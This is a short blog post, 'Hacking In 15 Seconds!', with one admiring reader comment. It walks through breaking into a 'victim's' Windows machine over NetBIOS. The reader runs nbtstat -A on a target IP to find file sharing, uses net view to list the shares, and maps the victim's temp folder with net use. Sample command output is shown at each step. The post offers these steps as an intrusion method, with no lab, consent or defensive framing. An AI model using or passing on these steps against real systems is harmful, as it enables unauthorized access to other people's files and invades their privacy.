Pages

Hacking In 15 Seconds!

Hacking In 15 Seconds!

Hacking In 15 Seconds!

If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt

Code:


Nbtstat -A



[e.g: nbtstat -A 207.175.1.1]



This will give you a read out that looks like this

Code:
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________


The numbers in the <> are hex code values. What we are

interested in is the “Hex Code- number of <20>.

A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Code:
Net view \\

[e.g : net view \\207.175.1.1]



You will then get a response that looks something like this.
Code:

Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________

(The command was completed successfully.)



Code:
Net use x: \\\temp

[e.g : net use x: \\207.175.1.1\temp]



If all goes well for you, you will then get a response of

Code:
(The command was completed successfully.)

Open my computer you will see your victim's temp folder there

1 comments:

vighnesh nair said...

awesome tricks ! u r a great programmer i think :)

Blog Archive